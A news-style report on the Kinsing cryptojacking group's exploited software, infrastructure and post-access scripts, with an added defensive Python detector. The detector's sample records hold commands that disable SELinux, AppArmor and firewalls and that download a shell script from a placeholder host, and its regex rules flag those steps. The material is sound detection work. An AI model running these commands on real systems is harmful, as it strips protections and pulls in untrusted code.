The cryptojacking group known as Kinsing has demonstrated an ability to continually evolve & adapt, proving to be a persistent threat by swiftly integrating newly disclosed vulnerabilities into its exploit arsenal & expanding its botnet.
The findings come from cloud security firm Aqua, which described the threat actor as actively orchestrating illicit cryptocurrency mining campaigns since 2019.
Crypto-Mining Botnet
Kinsing (aka H2Miner), a name given to both the malware & the adversary behind it, has consistently expanded its toolkit with new exploits to enrol infected systems in a crypto-mining botnet. It was 1st documented by TrustedSec in Jan. 2020.
In recent years, campaigns involving the Golang-based malware have weaponised various flaws in Apache ActiveMQ, Apache Log4j, Apache NiFi, Apache Tomcat, Atlassian Confluence, Citrix, Liferay Portal, Linux, Openfire, Oracle WebLogic Server, & SaltStack to breach vulnerable systems.
Misconfigured
Other methods have also involved exploiting misconfigured Docker, PostgreSQL, & Redis instances to obtain initial access, after which the endpoints are put into a botnet for crypto-mining, but not before disabling security services & removing rival miners already installed on the hosts.
Analysis by CyberArk in 2021 unearthed commonalities between Kinsing & another malware called NSPPS, concluding that both the strains “represent the same family.”
Kinsing’s attack structure falls into 3 primary categories: Initial servers used for scanning & exploiting vulnerabilities, download servers responsible for staging payloads & scripts, & command-&-control (C2) servers that maintain contact with compromised servers.
Russia
The IP addresses used for C2 servers translate to Russia, while those that are used to download the scripts & binaries span countries like Luxembourg, Russia, the Netherlands, & Ukraine.
“Kinsing targets various operating systems with different tools,” Aqua observed. “For instance, Kinsing often uses shell & Bash scripts to exploit Linux servers.”
“We’ve also seen that Kinsing is targeting Openfire on Windows servers using a PowerShell script. When running on Unix, it is usually looking to download a binary that runs on x86 or ARM.”
Open Source
Another notable aspect of the threat actor’s campaigns is that 91% of the targeted applications are open source, with the group mainly singling out runtime applications (67%), databases (9%), & cloud infrastructure (8%).
3 Distinct Categories
An extensive analysis of the artifacts has further revealed 3 distinct categories of programs –
- Type I & Type II scripts, which are deployed after initial access & are used to download next-stage attack components, eliminate competition, evade defences by disabling the firewall, terminate security tools like SELinux, AppArmor, & Aliyun Aegis, & deploy a rootkit to hide the malicious processes
- Auxiliary scripts, which are designed to accomplish initial access by exploiting a vulnerability, disable specific security components associated with Alibaba Cloud & Tencent Cloud services from a Linux system, open a reverse shell to a server under the attacker’s control, & facilitate the retrieval of minor payloads.
- Binaries, which function as a 2nd-stage payload, including the core Kinsing malware & the crypto-miner used to mine Monero.
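To show the defender's side of the post-access behaviour described for the Type I & Type II scripts, here is an added example (not code from Aqua's report or from the article) that scans constructed audit-style command records for the defence-evasion steps listed above & flags a host only when several of them cluster together, since a single disabled control is routine admin noise. The record format, host names & the Aegis uninstall path are assumptions made for the sample.

```python
import re

# Constructed sample of shell-command records (e.g. auditd EXECVE events
# normalised by a SIEM); hosts, paths and URL are invented for this example.
SAMPLE_EVENTS = [
    "host=web01 uid=0 cmd=setenforce 0",
    "host=web01 uid=0 cmd=systemctl stop apparmor",
    "host=web01 uid=0 cmd=ufw disable",
    "host=web01 uid=0 cmd=/usr/local/aegis/uninstall.sh",   # assumed path
    "host=web01 uid=0 cmd=curl -s http://example.invalid/x.sh -o /tmp/x.sh",
    "host=db02 uid=1000 cmd=ls -la /var/log",
]

# One rule per defence-evasion category named in the article.
RULES = {
    "selinux_disabled": re.compile(r"\bsetenforce\s+0\b"),
    "apparmor_stopped": re.compile(
        r"\b(systemctl|service)\s+(stop|disable)\s+apparmor\b|\baa-teardown\b"),
    "firewall_disabled": re.compile(
        r"\bufw\s+disable\b|\biptables\s+-F\b"
        r"|\b(systemctl|service)\s+(stop|disable)\s+(firewalld|iptables)\b"),
    "cloud_agent_removed": re.compile(r"aegis.*uninstall|uninstall.*aegis", re.I),
    "remote_script_fetch": re.compile(r"\b(curl|wget)\b.*https?://\S+\.sh\b"),
}


def classify(event):
    """Return the set of rule names matched by one command record."""
    return {name for name, rx in RULES.items() if rx.search(event)}


def hosts_with_evasion_chain(events, min_categories=2):
    """Group rule hits per host and return only hosts where at least
    min_categories distinct categories appear: the combination, not any
    one command, is the post-access sequence the analysis describes."""
    hits = {}
    for ev in events:
        m = re.search(r"host=(\S+)", ev)
        if not m:
            continue  # malformed record; skip rather than guess a host
        hits.setdefault(m.group(1), set()).update(classify(ev))
    return {h: sorted(c) for h, c in hits.items() if len(c) >= min_categories}


if __name__ == "__main__":
    for host, cats in hosts_with_evasion_chain(SAMPLE_EVENTS).items():
        print(host, ", ".join(cats))
```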
Mining Process
The malware, for its part, is engineered to keep tabs on the mining process & share its process identifier (PID) with the C2 server, perform connectivity checks, & send execution results, among other tasks.
“Kinsing targets Linux & Windows systems, often by exploiting vulnerabilities in web applications or misconfigurations such as Docker API & Kubernetes to run crypto miners,” Aqua commented. “To prevent potential threats like Kinsing, initiative-taking measures such as hardening workloads pre-deployment are crucial.”
The disclosure comes as botnet malware families are increasingly finding ways to broaden their reach & recruit machines into a network for conducting malicious activities.
Redis Servers
This is best exemplified by P2PInfect, a Rust malware that has been found to exploit poorly-secured Redis servers to deliver variants compiled for MIPS & ARM architectures.
“The main payload is capable of performing various operations, including propagating, & delivering other modules with filenames that speak for themselves like ‘miner’ & ‘winminer’,” Nozomi Networks, which discovered samples targeting ARM earlier this year, explained.
“As its name suggests, the malware is capable of performing Peer-to-Peer (P2P) communications without relying on a single Command & Control server (C&C) to propagate attackers’ commands.”